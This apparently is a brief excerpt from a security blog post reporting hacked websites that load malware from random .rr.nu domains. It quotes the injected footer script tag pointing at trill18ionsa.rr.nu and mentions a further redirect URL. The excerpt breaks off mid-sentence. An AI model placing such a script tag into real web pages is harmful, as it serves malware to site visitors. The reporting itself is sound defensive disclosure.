No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the .rr.nu TLD. This is what gets added to the footer of the hacked sites: <script src= "http://trill18ionsa.rr.nu/pmg.php?dr=1"></script> Once loaded, it does another level of redirection to http://ixeld52erlya.rr.nu/n.php?h=1&s=pmg (random domain, but […]
Latest Comments